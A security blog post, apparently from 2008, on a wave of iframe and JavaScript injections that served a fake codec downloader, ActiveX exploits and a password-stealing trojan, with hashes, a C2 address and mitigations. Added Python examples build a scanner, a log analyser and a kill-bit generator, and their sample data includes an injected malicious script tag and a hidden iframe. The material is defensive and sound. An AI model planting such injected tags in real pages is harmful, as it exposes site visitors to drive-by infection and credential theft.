Saturday

Attack of the Killer iframes and the javascript infections



At the beginning of the week, we saw a rise in iframe attacks. Now, at the end of the week, it's time to review the entire story. It's hard to have missed all the different blogs and security centers reporting on it. Among the better known websites, Trend Micro joined the ranks of the victims.

1. The first iframe attacks led to a new site which enticed the user to install a new codec. A video provided by Avert Labs shows what an end user would see.


March 2008 - Mass Hack Demo from Schmooog on Vimeo.
Scanner results: 22% of scanners (8/36) found malware!

File name: democodec1292.exe
File size: 74823 bytes
MD5: 30965fdbd893990dd24abda2285d9edc
SHA1: 53eacbb9cdf42394bd455d9bd2275f05730332f7
Detections: Downloader.Zlob.ZV; Trojan-Downloader.Win32.Zlob.eie; TrojanDownloader.Zlob.epx

As you can see, initial AV detection was not really good. But this attack still needed user interaction to execute the code.

2. Another wave of MASSIVE web-based infection started this week as a JavaScript include was injected into websites and led visitors to a malicious website hosted on 2117966.net. For this one, user interaction was not needed: the site tries to exploit several vulnerabilities.

Two days ago, The Register talked of almost 23,000 infections. Just doing a Google search for "script src http www.2117966.net fuckjp.js" reveals it's about 24,500 now. I advise you not to click through to those sites.

The malicious websites attempt to exploit the vulnerabilities described in MS06-014, MS07-004, MS06-067 and MS06-057, and a number of ActiveX vulnerabilities:

  • Baofeng Storm ActiveX
  • Ourgame GLChat ActiveX
  • Microsoft Internet Explorer VML (VU#122084)
  • Qvod Player ActiveX
  • Microsoft RDS.Dataspace ActiveX (VU#234812)
  • RealPlayer playlist ActiveX (VU#871673)
  • Storm Player ActiveX
  • Microsoft Windows WebViewFolderIcon ActiveX (VU#753044)
  • Xunlei Thunder DapPlayer ActiveX
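
The injection itself is a one-line `<script src>` tag (or a hidden iframe) added to otherwise legitimate pages, so the fastest way to find out whether your own site is among the 24,500 is to scan your HTML for off-site script and frame sources. The following is an added example written for this post, not code from the original article or from any of the vendors mentioned: it parses a page with Python's standard HTML parser and flags script/iframe tags that point at the host named above, at any untrusted third-party host, or that are hidden with zero size or display:none. `TRUSTED_HOSTS` and the sample page are assumptions constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Host named in the post as the source of this week's injected script.
KNOWN_BAD_HOSTS = {"www.2117966.net", "2117966.net"}
# Assumed: the hosts the scanned site legitimately loads scripts and frames from.
TRUSTED_HOSTS = {"www.example.com"}


def _is_hidden(attrs):
    """True for the zero-size / display:none iframes attackers use to stay unnoticed."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return (attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
            or "display:none" in style or "visibility:hidden" in style)


class InjectionFinder(HTMLParser):
    """Collect <script src> and <iframe src> tags that point off-site or are hidden."""

    def __init__(self, trusted):
        super().__init__()
        self.trusted = trusted
        self.in_script = False
        self.findings = []  # (tag, src-or-snippet, [reasons])

    def handle_starttag(self, tag, attrs):
        a = {k: v for k, v in attrs}
        if tag == "script":
            self.in_script = True
        if tag in ("script", "iframe") and a.get("src"):
            self._check(tag, a["src"], a)

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        # Inline script bodies that mention the known bad host (e.g. document.write of a tag).
        if self.in_script and any(h in data for h in KNOWN_BAD_HOSTS):
            self.findings.append(("script", data.strip()[:60],
                                  ["inline reference to known malicious host"]))

    def _check(self, tag, src, a):
        host = urlparse(src).hostname
        if host is None:  # relative URL: same origin, nothing to flag
            return
        reasons = []
        if host in KNOWN_BAD_HOSTS:
            reasons.append("known malicious host")
        elif host not in self.trusted:
            reasons.append("third-party host")
        if tag == "iframe" and _is_hidden(a):
            reasons.append("hidden iframe")
        if reasons:
            self.findings.append((tag, src, reasons))


def scan_html(html, trusted=TRUSTED_HOSTS):
    """Return a list of (tag, src, reasons) for every suspicious include in the page."""
    parser = InjectionFinder(trusted)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample page for this example (not a real capture); the second
# script line mirrors the injected tag the post's Google search looks for.
SAMPLE_PAGE = """<html><head><title>Corporate site</title>
<script src="/js/site.js"></script>
<script src="http://www.2117966.net/fuckjp.js"></script>
</head><body>
<p>Welcome</p>
<iframe src="http://evil.example.net/in.cgi" width="0" height="0" style="display:none"></iframe>
<iframe src="https://www.example.com/widget" width="300" height="200"></iframe>
</body></html>"""

if __name__ == "__main__":
    for tag, src, reasons in scan_html(SAMPLE_PAGE):
        print(f"{tag:6} {src}  <- {', '.join(reasons)}")
```

Run it over every file under the web root (and over what the web server actually serves, since some injections live in database-backed templates rather than on disk). A hit on a third-party host is not proof of compromise, but a host you did not add yourself is exactly what this wave looks like from the victim's side.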
Shadowserver.org has some more information about how the Trojan works:

The trojan does not appear to do anything at all and makes no outbound connections if your machine is idle. However, if Internet Explorer is launched and makes a POST request involving a password field, the trojan will spring into action sending encrypted traffic to another server in China. The trojan appears to specifically look for password input tags (`<input type="password">`). It does not appear to send off POST data unless there is a password input tag. If it detects a qualifying POST request it will immediately begin sending encrypted traffic to a Chinese server at 61.188.39.175 on port 2034. It does not appear to be using DNS to find this IP address.

Malware Binary:

File MD5: dca9063dd1f1f5dfc4c313f0136114c2
File Size: 69632 bytes

Malware DLL:

File MD5: d24d9c46a79ba36d742a1f0b61ed9cc8
File Size: 45056 bytes
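
Two details in the Shadowserver description are directly usable for detection: the fixed command-and-control endpoint (61.188.39.175 on TCP port 2034) and the fact that the trojan never resolves it through DNS. A host that suddenly talks to an external IP address that no DNS answer ever returned is worth a look even when the IP is not on a blocklist. The block below is an added example for this post, not Shadowserver's code: it walks through a small constructed firewall/DNS log (the line format is an assumption made for the example, not any real product's format), remembers the IPs seen in DNS answers, and alerts on connections to the known C2 endpoint and on direct-IP connections with no DNS lookup behind them.

```python
import ipaddress
import re

# C2 endpoint from the Shadowserver description quoted in the post.
C2_IP, C2_PORT = "61.188.39.175", 2034

# Constructed sample log for this example (not a real capture). Assumed format:
#   "<time> dns <client> <qname> -> <answer ip>"
#   "<time> conn <src ip> -> <dst ip>:<dst port>"
SAMPLE_LOG = """\
10:00:01 dns 10.1.1.20 www.example.com -> 93.184.216.34
10:00:02 conn 10.1.1.20 -> 93.184.216.34:80
10:00:05 conn 10.1.1.20 -> 10.1.1.5:445
10:03:10 conn 10.1.1.20 -> 61.188.39.175:2034
10:04:00 conn 10.1.1.31 -> 61.188.40.1:443
"""

DNS_RE = re.compile(r"^(\S+) dns (\S+) (\S+) -> (\S+)$")
CONN_RE = re.compile(r"^(\S+) conn (\S+) -> (\S+):(\d+)$")


def analyse(log_text):
    """Return alerts as (time, src, dst, port, reason) tuples."""
    resolved = set()  # every IP that appeared in a DNS answer so far
    alerts = []
    for line in log_text.splitlines():
        m = DNS_RE.match(line)
        if m:
            resolved.add(m.group(4))
            continue
        m = CONN_RE.match(line)
        if not m:
            continue  # unknown line type: ignore
        ts, src, dst, port = m.group(1), m.group(2), m.group(3), int(m.group(4))
        if ipaddress.ip_address(dst).is_private:
            continue  # internal traffic is out of scope here
        if dst == C2_IP and port == C2_PORT:
            alerts.append((ts, src, dst, port, "known C2 endpoint"))
        elif dst not in resolved:
            # The trojan hard-codes its server; no DNS answer precedes the connect.
            alerts.append((ts, src, dst, port, "connection to IP never seen in a DNS answer"))
    return alerts


if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG):
        print("ALERT", *alert)
```

The "never seen in DNS" rule will also fire on legitimate hard-coded IPs (update services, some VPN clients), so treat it as a lead to correlate with the browser's POST activity rather than as a block rule; the C2 address and port, on the other hand, can go straight onto the firewall. Note that the example keeps DNS answers in memory for the whole log; in a real pipeline you would expire them after the record's TTL.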

So you may have noticed that it pointed to a server in China. Hmmmm...... Also, the name of the script was fuckjp.js, and we can guess what JP stands for. When looking for some information on the script, I found this piece through The Dark Visitor from the K'LLER blog:
After analyzing the script I remembered that these kinds of scripts are created by using some web attacker toolkit like MPack, FirePack, IcePack, WPack or AnnyPack, in which you just have to feed some info like the payload and place it on a compromised web server or a new one. But in this case it is VIP 2.74 from Chinese hackers. Latest version is 2.842.
No matter who the wielder and what the origin of this malware is, take the necessary steps to protect yourself. So make sure you install all your patches, try to avoid the use of ActiveX or Java, or use mitigating factors such as kill bits or NoScript. Corporate networks might want to block traffic to www.2117966.net.
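
A kill bit is the mitigation to reach for when a vulnerable ActiveX control cannot be patched or removed yet: setting bit 0x400 in the `Compatibility Flags` DWORD under `HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}` makes Internet Explorer refuse to instantiate that control even though it stays installed. The following is an added example, not code from the post: it produces a .reg file that sets the kill bit for a set of CLSIDs, OR-ing the bit into any flags already present rather than overwriting them. The two CLSIDs in `SAMPLE_CLSIDS` are the ones I know from the Microsoft bulletins for two controls in the list above; verify them against the bulletin before rolling the file out, since a wrong CLSID silently does nothing.

```python
import re

KILL_BIT = 0x400  # Compatibility Flags bit: IE refuses to instantiate the control
KEY_PREFIX = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"
CLSID_RE = re.compile(r"^\{[0-9A-F]{8}(-[0-9A-F]{4}){3}-[0-9A-F]{12}\}$")

# CLSIDs for two controls named in the post, as published in the bulletins that
# cover them. Check the bulletin yourself before deploying.
SAMPLE_CLSIDS = {
    "{BD96C556-65A3-11D0-983A-00C04FC29E36}": "RDS.DataSpace (MS06-014)",
    "{844F4806-E8A8-11D2-9652-00C04FC30871}": "WebViewFolderIcon (MS06-057)",
}


def killbit_flags(existing=0):
    """OR the kill bit into the existing Compatibility Flags so other bits survive."""
    return existing | KILL_BIT


def killbit_reg(clsids, existing_flags=None):
    """Return .reg file text that sets the kill bit for each CLSID in `clsids`.

    `clsids` maps CLSID -> human-readable comment; `existing_flags` optionally
    maps CLSID -> the flags value currently on the machine (read it with reg.exe
    or PowerShell before generating, if you need to preserve other bits).
    """
    existing_flags = existing_flags or {}
    lines = ["Windows Registry Editor Version 5.00", ""]
    for clsid, comment in clsids.items():
        clsid = clsid.upper()
        if not CLSID_RE.match(clsid):
            raise ValueError(f"not a CLSID: {clsid}")
        flags = killbit_flags(existing_flags.get(clsid, 0))
        lines.append(f"; {comment}")
        lines.append(f"[{KEY_PREFIX}\\{clsid}]")
        lines.append(f'"Compatibility Flags"=dword:{flags:08x}')
        lines.append("")
    return "\n".join(lines)


if __name__ == "__main__":
    print(killbit_reg(SAMPLE_CLSIDS))
```

Import the resulting file with `regedit /s killbits.reg` (or push it through Group Policy). The kill bit only stops the control from loading inside IE and other hosts that honour the ActiveX Compatibility key; it does not fix the bug, so the patch still has to follow.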


3 comments:

Aa'ed Alqarta said...

As a system admin, you have to be proactive in these situations, by preventing suspicious outbound connections (.cn domains), and monitor the FW/Proxy logs for any. Here, I've got a checklist to address the IFRAME attacks

http://extremesecurity.blogspot.com/2008/03/iframe-attacks-actions-to-be-taken.html

Security4all said...

Not just .cn domains but 3322.org and similar might be useful.

Also have a look at this presentation:
http://security4all.blogspot.com/2008/03/my-desktop-security-presentation-at.html